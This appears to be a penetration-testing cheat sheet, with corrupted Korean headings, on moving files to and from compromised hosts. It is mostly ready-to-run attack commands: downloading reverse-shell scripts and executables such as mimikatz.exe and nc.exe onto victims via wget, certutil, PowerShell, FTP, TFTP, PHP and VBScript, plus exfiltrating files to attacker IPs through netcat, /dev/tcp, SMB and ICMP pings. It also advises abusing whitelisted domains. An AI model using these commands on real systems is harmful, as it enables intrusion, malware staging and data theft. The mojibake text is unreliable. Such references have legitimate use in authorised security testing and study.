Commonly whitelisted domains to exfiltrate information
Check https://lots-project.com/ to find commonly whitelisted domains that can be abused
Copy&Paste Base64
๋ฆฌ๋
์ค
Copy base64 -w0 < fil e > #Encode file
base64 -d file #Decode file
์๋์ฐ
Copy certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
HTTP
๋ฆฌ๋
์ค
Copy wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
์๋์ฐ
Copy certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C: \d ownloads \e xamplefile.pdf
#PS
( New-Object Net.WebClient ) .DownloadFile( "http://10.10.14.2:80/taskkill.exe" , "C:\Windows\Temp\taskkill.exe" )
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
ํ์ผ ์
๋ก๋
Copy # Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world
# Send a file
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
HTTPS ์๋ฒ
Copy # from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:443
### PYTHON 2
import BaseHTTPServer , SimpleHTTPServer
import ssl
httpd = BaseHTTPServer . HTTPServer (( '0.0.0.0' , 443 ), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd . socket = ssl . wrap_socket (httpd.socket, certfile = './server.pem' , server_side = True )
httpd . serve_forever ()
###
### PYTHON3
from http . server import HTTPServer , BaseHTTPRequestHandler
import ssl
httpd = HTTPServer (( '0.0.0.0' , 443 ), BaseHTTPRequestHandler)
httpd . socket = ssl . wrap_socket (httpd.socket, certfile = "./server.pem" , server_side = True )
httpd . serve_forever ()
###
### USING FLASK
from flask import Flask , redirect , request
from urllib . parse import quote
app = Flask ( __name__ )
@app . route ( '/' )
def root ():
print (request. get_json ())
return "OK"
if __name__ == "__main__" :
app . run (ssl_context = 'adhoc' , debug = True , host = "0.0.0.0" , port = 8443 )
###
FTP
FTP ์๋ฒ (ํ์ด์ฌ)
Copy pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
FTP ์๋ฒ (NodeJS)
Copy sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
FTP ์๋ฒ (pure-ftp)
Copy apt-get update && apt-get install pure-ftp
Copy #Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Windows ํด๋ผ์ด์ธํธ
Copy #Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
SMB
Kali๋ฅผ ์๋ฒ๋ก ์ฌ์ฉ
Copy kali_op1 > impacket-smbserver -smb2support kali ` pwd ` # Share current directory
kali_op2 > smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test ` pwd `
๋๋ samba ๋ฅผ ์ฌ์ฉํ์ฌ smb ๊ณต์ ๋ฅผ ์์ฑํฉ๋๋ค:
Copy apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
์๋์ฐ
Copy CMD-Wind > \\ 10.10.14.14 \p ath \t o \e xe
CMD-Wind > net use z: \\ 10.10.14.14 \t est /user:test test #For SMB using credentials
WindPS-1 > New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2 > cd new_disk:
SCP
๊ณต๊ฒฉ์๋ SSHd๊ฐ ์คํ ์ค์ด์ด์ผ ํฉ๋๋ค.
Copy scp < usernam e > @ < Attacker_I P > : < director y > / < filenam e >
SSHFS
ํผํด์๊ฐ SSH๋ฅผ ๊ฐ์ง๊ณ ์๋ค๋ฉด, ๊ณต๊ฒฉ์๋ ํผํด์์ ๋๋ ํ ๋ฆฌ๋ฅผ ๊ณต๊ฒฉ์์๊ฒ ๋ง์ดํธํ ์ ์๋ค.
Copy sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions < Target usernam e > @ < Target IP addres s > : < Full path to folde r > / /mnt/sshfs/
NC
Copy nc -lvnp 4444 > new_file
nc -vn < I P > 4444 < exfil_file
/dev/tcp
ํผํด์๋ก๋ถํฐ ํ์ผ ๋ค์ด๋ก๋
Copy nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
ํผํด์์๊ฒ ํ์ผ ์
๋ก๋
Copy nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6 < /dev/tcp/10.10.10.10/4444
cat < & 6 > file.txt
thanks to @BinaryShadow_
ICMP
Copy # To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line ; do ping -c 1 -p $line < IP attacke r > ; done
#This will 4bytes per ping packet (you could probably increase this until 16)
Copy from scapy . all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet ( pkt ):
if pkt . haslayer (ICMP):
if pkt [ ICMP ]. type == 0 :
data = pkt [ ICMP ]. load [ - 4 :] #Read the 4bytes interesting
print ( f " { data. decode ( 'utf-8' ) } " , flush = True , end = "" )
sniff (iface = "tun0" , prn = process_packet)
SMTP
SMTP ์๋ฒ์ ๋ฐ์ดํฐ๋ฅผ ๋ณด๋ผ ์ ์๋ค๋ฉด, ํ์ด์ฌ์ ์ฌ์ฉํ์ฌ ๋ฐ์ดํฐ๋ฅผ ์์ ํ SMTP๋ฅผ ์์ฑํ ์ ์์ต๋๋ค:
Copy sudo python -m smtpd -n -c DebuggingServer :25
TFTP
๊ธฐ๋ณธ์ ์ผ๋ก XP์ 2003์์๋ (๋ค๋ฅธ ๋ฒ์ ์์๋ ์ค์น ์ค์ ๋ช
์์ ์ผ๋ก ์ถ๊ฐํด์ผ ํจ)
Kali์์, TFTP ์๋ฒ ์์ :
Copy #I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp
ํ์ด์ฌ์ TFTP ์๋ฒ:
Copy pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
ํฌ์์ ์์ Kali ์๋ฒ์ ์ฐ๊ฒฐํฉ๋๋ค:
Copy tftp -i < KALI-I P > get nc.exe
PHP
PHP ์๋ผ์ด๋๋ก ํ์ผ ๋ค์ด๋ก๋:
Copy echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
VBScript
Copy Attacker > python -m SimpleHTTPServer 80
ํฌ์์
Copy echo strUrl = WScript.Arguments.Item ( 0 ) > wget.vbs
echo StrFile = WScript.Arguments.Item ( 1 ) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject ( "WinHttp.WinHttpRequest.5.1" ) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject ( "WinHttp.WinHttpRequest" ) >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject ( "MSXML2.ServerXMLHTTP" ) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject ( "Microsoft.XMLHTTP" ) >> wget.vbs
echo http.Open "GET" , strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject ( "Scripting.FileSystemObject" ) >> wget.vbs
echo Set ts = fs.CreateTextFile ( StrFile, True ) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound ( varByteArray ) >> wget.vbs
echo ts.Write Chr ( 255 And Ascb ( Midb(varByteArray,lngCounter + 1, 1 ))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Copy cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
Debug.exe
debug.exe
ํ๋ก๊ทธ๋จ์ ์ด์ง ํ์ผ์ ๊ฒ์ฌํ ์ ์์ ๋ฟ๋ง ์๋๋ผ 16์ง์์์ ์ด์ง ํ์ผ์ ์ฌ๊ตฌ์ฑํ ์ ์๋ ๊ธฐ๋ฅ ๋ ๊ฐ์ง๊ณ ์์ต๋๋ค. ์ด๋ ์ด์ง ํ์ผ์ 16์ง์๋ฅผ ์ ๊ณตํจ์ผ๋ก์จ debug.exe
๊ฐ ์ด์ง ํ์ผ์ ์์ฑํ ์ ์์์ ์๋ฏธํฉ๋๋ค. ๊ทธ๋ฌ๋ debug.exe
๋ ์ต๋ 64kb ํฌ๊ธฐ์ ํ์ผ์ ์กฐ๋ฆฝํ๋ ๋ฐ ์ ํ์ด ์๋ค๋ ์ ์ ์ ์ํด์ผ ํฉ๋๋ค.
Copy # Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
๊ทธ๋ฐ ๋ค์ ํ
์คํธ๋ฅผ ์๋์ฐ ์
ธ์ ๋ณต์ฌํ์ฌ ๋ถ์ฌ๋ฃ์ผ๋ฉด nc.exe๋ผ๋ ํ์ผ์ด ์์ฑ๋ฉ๋๋ค.
DNS